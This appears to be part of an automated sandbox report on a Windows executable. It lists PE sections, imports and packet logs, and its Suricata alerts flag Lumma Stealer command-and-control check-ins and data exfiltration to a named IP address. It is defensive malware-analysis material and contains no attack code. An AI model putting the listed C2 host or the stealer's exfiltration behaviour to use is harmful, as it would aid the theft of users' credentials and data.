.rdata	0xee8000	0xd33d10	0xd33e00	2840d63f2e3cbf6b304e2b29918cc151	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.pdata	0x1c1c000	0x5832c	0x58400	cd3b1509b139a09337c75caba7588515	False	0.40110437322946174	data	6.023100042235163	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.xdata	0x1c75000	0x34fc	0x3600	474362023b9a8d8006963176bcb1a894	False	0.1916232638888889	data	4.476075708233727	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.bss	0x1c79000	0xa3560	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x1d1d000	0x4e	0x200	59894bd46f22467c6fba5998fd9aa86f	False	0.1328125	data	0.9168902136227094	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.idata	0x1d1e000	0x14ec	0x1600	73543fe492ba694c6f4066e63bf8da45	False	0.30806107954545453	data	4.700054913582164	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x1d20000	0x70	0x200	bed1e4dbcc01ac022356d6b461c3f56e	False	0.083984375	data	0.47677526113352753	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x1d21000	0x10	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1d22000	0x11448	0x11600	13451d56f69335207963c534009b9414	False	0.09012477517985612	data	2.138503865964636	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x1d34000	0x41d64	0x41e00	db564ee9c3296a685f774d73bc956b61	False	0.1475072639943074	data	5.443108273898175	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x1d22130	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 15118 x 15118 px/m			0.0769105642966994
RT_GROUP_ICON	0x1d32958	0x14	data			1.15
RT_VERSION	0x1d3296c	0x4f4	data	English	United States	0.2752365930599369
RT_MANIFEST	0x1d32e60	0x5e8	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.4252645502645503

Imports

DLL

Import

KERNEL32.dll

AddAtomA, AddVectoredContinueHandler, AddVectoredExceptionHandler, CloseHandle, CreateEventA, CreateFileA, CreateIoCompletionPort, CreateMutexA, CreateSemaphoreA, CreateThread, CreateWaitableTimerExW, DeleteAtom, DeleteCriticalSection, DuplicateHandle, EnterCriticalSection, ExitProcess, FindAtomA, FormatMessageA, FreeEnvironmentStringsW, GetAtomNameA, GetConsoleMode, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetEnvironmentStringsW, GetErrorMode, GetHandleInformation, GetLastError, GetProcAddress, GetProcessAffinityMask, GetQueuedCompletionStatusEx, GetStartupInfoA, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetSystemTimeAsFileTime, GetThreadContext, GetThreadPriority, GetTickCount, InitializeCriticalSection, IsDBCSLeadByteEx, IsDebuggerPresent, LeaveCriticalSection, LoadLibraryExW, LoadLibraryW, LocalFree, MultiByteToWideChar, OpenProcess, OutputDebugStringA, PostQueuedCompletionStatus, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseException, RaiseFailFastException, ReleaseMutex, ReleaseSemaphore, RemoveVectoredExceptionHandler, ResetEvent, ResumeThread, RtlLookupFunctionEntry, RtlVirtualUnwind, SetConsoleCtrlHandler, SetErrorMode, SetEvent, SetLastError, SetProcessAffinityMask, SetProcessPriorityBoost, SetThreadContext, SetThreadPriority, SetUnhandledExceptionFilter, SetWaitableTimer, Sleep, SuspendThread, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TryEnterCriticalSection, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WerGetFlags, WerSetFlags, WideCharToMultiByte, WriteConsoleW, WriteFile, __C_specific_handler

msvcrt.dll

___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _assert, _beginthread, _beginthreadex, _cexit, _commode, _endthreadex, _errno, _fmode, _initterm, _lock, _memccpy, _onexit, _setjmp, _strdup, _ultoa, _unlock, abort, calloc, clock, exit, fflush, fprintf, fputc, free, fwrite, localeconv, longjmp, malloc, memcmp, memcpy, memmove, memset, printf, qsort, realloc, signal, strerror, strlen, strncmp, vfprintf, wcslen

Exports

Name	Ordinal	Address
_cgo_dummy_export	1	0x141d1b750

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-26T20:34:17.067725+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	49738	443	192.168.2.4	172.67.159.243
2024-07-26T20:34:04.320473+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	49731	443	192.168.2.4	172.67.159.243
2024-07-26T20:34:42.629750+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	61397	40.127.169.103	192.168.2.4
2024-07-26T20:34:06.971675+0200	TCP	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	49733	443	192.168.2.4	172.67.159.243
2024-07-26T20:34:08.122528+0200	TCP	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	49734	443	192.168.2.4	172.67.159.243
2024-07-26T20:34:41.323239+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	61396	40.127.169.103	192.168.2.4
2024-07-26T20:34:19.147395+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49739	20.114.59.183	192.168.2.4
2024-07-26T20:34:05.636459+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	49732	443	192.168.2.4	172.67.159.243

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 26, 2024 20:34:03.323817015 CEST	49731	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:03.323862076 CEST	443	49731	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:03.323930979 CEST	49731	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:03.327691078 CEST	49731	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:03.327728987 CEST	443	49731	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:03.834666014 CEST	443	49731	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:03.834777117 CEST	49731	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:03.839355946 CEST	49731	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:03.839382887 CEST	443	49731	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:03.839797974 CEST	443	49731	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:03.892023087 CEST	49731	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:03.909229994 CEST	49731	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:03.909265995 CEST	49731	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:03.909621954 CEST	443	49731	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:04.320455074 CEST	443	49731	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:04.320728064 CEST	443	49731	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:04.320811987 CEST	49731	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:04.323342085 CEST	49731	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:04.323384047 CEST	443	49731	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:04.334774971 CEST	49732	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:04.334863901 CEST	443	49732	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:04.334969997 CEST	49732	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:04.335258961 CEST	49732	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:04.335289955 CEST	443	49732	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:04.945640087 CEST	443	49732	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:04.945806026 CEST	49732	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:04.946902037 CEST	49732	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:04.946930885 CEST	443	49732	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:04.947434902 CEST	443	49732	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:04.949016094 CEST	49732	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:04.949059963 CEST	49732	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:04.949125051 CEST	443	49732	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:05.636564970 CEST	443	49732	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:05.636681080 CEST	443	49732	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:05.636784077 CEST	49732	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:05.636823893 CEST	443	49732	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:05.640860081 CEST	443	49732	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:05.640959024 CEST	49732	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:05.640995026 CEST	443	49732	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:05.644839048 CEST	443	49732	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:05.644911051 CEST	49732	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:05.644921064 CEST	443	49732	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:05.644952059 CEST	443	49732	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:05.645009995 CEST	49732	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:05.647774935 CEST	443	49732	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:05.650540113 CEST	443	49732	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:05.650609016 CEST	49732	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:05.650619030 CEST	443	49732	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:05.650641918 CEST	443	49732	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:05.650703907 CEST	49732	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:05.653126001 CEST	443	49732	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:05.704643965 CEST	49732	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:05.724703074 CEST	443	49732	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:05.725303888 CEST	443	49732	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:05.725526094 CEST	49732	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:05.725526094 CEST	49732	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:05.726139069 CEST	49732	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:05.726178885 CEST	443	49732	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:05.858578920 CEST	49733	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:05.858619928 CEST	443	49733	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:05.858731985 CEST	49733	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:05.859025002 CEST	49733	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:05.859041929 CEST	443	49733	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:06.363713026 CEST	443	49733	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:06.363817930 CEST	49733	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:06.365103960 CEST	49733	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:06.365118980 CEST	443	49733	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:06.365359068 CEST	443	49733	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:06.366471052 CEST	49733	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:06.366745949 CEST	49733	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:06.366769075 CEST	443	49733	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:06.366825104 CEST	49733	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:06.366833925 CEST	443	49733	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:06.971777916 CEST	443	49733	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:06.972028017 CEST	443	49733	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:06.972033024 CEST	49733	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:06.972076893 CEST	49733	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:07.083393097 CEST	49734	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:07.083455086 CEST	443	49734	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:07.083574057 CEST	49734	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:07.083880901 CEST	49734	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:07.083899975 CEST	443	49734	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:07.542944908 CEST	443	49734	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:07.543077946 CEST	49734	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:07.544411898 CEST	49734	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:07.544426918 CEST	443	49734	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:07.544636965 CEST	443	49734	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:07.545943022 CEST	49734	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:07.546065092 CEST	49734	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:07.546092033 CEST	443	49734	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:08.122605085 CEST	443	49734	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:08.122831106 CEST	443	49734	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:08.122936010 CEST	49734	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:08.122999907 CEST	49734	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:08.123023987 CEST	443	49734	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:08.362942934 CEST	49735	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:08.362991095 CEST	443	49735	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:08.363070965 CEST	49735	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:08.363365889 CEST	49735	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:08.363380909 CEST	443	49735	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:08.985053062 CEST	443	49735	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:08.985249043 CEST	49735	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:08.987042904 CEST	49735	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:08.987067938 CEST	443	49735	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:08.987296104 CEST	443	49735	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:08.988446951 CEST	49735	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:08.988578081 CEST	49735	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:08.988617897 CEST	443	49735	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:08.988708973 CEST	49735	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:08.988725901 CEST	443	49735	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:09.932116985 CEST	443	49735	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:09.932390928 CEST	443	49735	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:09.932450056 CEST	49735	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:09.932562113 CEST	49735	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:09.932602882 CEST	443	49735	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:10.466413021 CEST	49736	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:10.466491938 CEST	443	49736	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:10.466590881 CEST	49736	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:10.466902018 CEST	49736	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:10.466932058 CEST	443	49736	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:10.974263906 CEST	443	49736	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:10.974432945 CEST	49736	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:10.975943089 CEST	49736	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:10.975970030 CEST	443	49736	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:10.976246119 CEST	443	49736	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:10.977597952 CEST	49736	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:10.977699041 CEST	49736	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:10.977710962 CEST	443	49736	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:11.642441988 CEST	443	49736	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:11.642524958 CEST	443	49736	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:11.642715931 CEST	49736	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:11.645085096 CEST	49736	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:11.645136118 CEST	443	49736	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:12.141426086 CEST	49737	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:12.141506910 CEST	443	49737	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:12.141623974 CEST	49737	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:12.141952991 CEST	49737	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:12.141973019 CEST	443	49737	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:12.625968933 CEST	443	49737	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:12.626080990 CEST	49737	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:12.627424955 CEST	49737	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:12.627433062 CEST	443	49737	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:12.627628088 CEST	443	49737	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:12.629769087 CEST	49737	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:12.630450964 CEST	49737	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:12.630480051 CEST	443	49737	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:12.630589008 CEST	49737	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:12.630620003 CEST	443	49737	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:12.631710052 CEST	49737	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:12.631746054 CEST	443	49737	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:12.631899118 CEST	49737	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:12.631927967 CEST	443	49737	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:12.632155895 CEST	49737	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:12.632188082 CEST	443	49737	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:12.632373095 CEST	49737	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:12.632400036 CEST	443	49737	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:12.632406950 CEST	49737	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:12.632419109 CEST	443	49737	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:12.632555962 CEST	49737	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:12.632575035 CEST	443	49737	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:12.632589102 CEST	49737	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:12.632766008 CEST	49737	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:12.632786036 CEST	49737	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:12.641138077 CEST	443	49737	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:12.641330957 CEST	49737	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:12.641372919 CEST	443	49737	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:12.641406059 CEST	49737	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:12.641458035 CEST	49737	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:12.641490936 CEST	49737	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:12.646222115 CEST	443	49737	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:15.742036104 CEST	443	49737	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:15.742280960 CEST	443	49737	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:15.742305994 CEST	49737	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:15.742340088 CEST	49737	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:15.778130054 CEST	49738	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:15.778161049 CEST	443	49738	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:15.778247118 CEST	49738	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:15.778537035 CEST	49738	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:15.778553009 CEST	443	49738	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:16.324687958 CEST	443	49738	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:16.324778080 CEST	49738	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:16.326420069 CEST	49738	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:16.326456070 CEST	443	49738	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:16.326776981 CEST	443	49738	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:16.328130960 CEST	49738	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:16.328150034 CEST	49738	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:16.328191042 CEST	443	49738	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:17.067815065 CEST	443	49738	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:17.068042994 CEST	443	49738	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:17.068140030 CEST	49738	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:17.068319082 CEST	49738	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:17.068337917 CEST	443	49738	172.67.159.243	192.168.2.4
Jul 26, 2024 20:34:17.068367004 CEST	49738	443	192.168.2.4	172.67.159.243
Jul 26, 2024 20:34:17.068372011 CEST	443	49738	172.67.159.243	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 26, 2024 20:34:03.300448895 CEST	52568	53	192.168.2.4	1.1.1.1
Jul 26, 2024 20:34:03.317682981 CEST	53	52568	1.1.1.1	192.168.2.4
Jul 26, 2024 20:34:36.243988991 CEST	53	65246	162.159.36.2	192.168.2.4
Jul 26, 2024 20:34:36.743046045 CEST	55486	53	192.168.2.4	1.1.1.1
Jul 26, 2024 20:34:36.751231909 CEST	53	55486	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
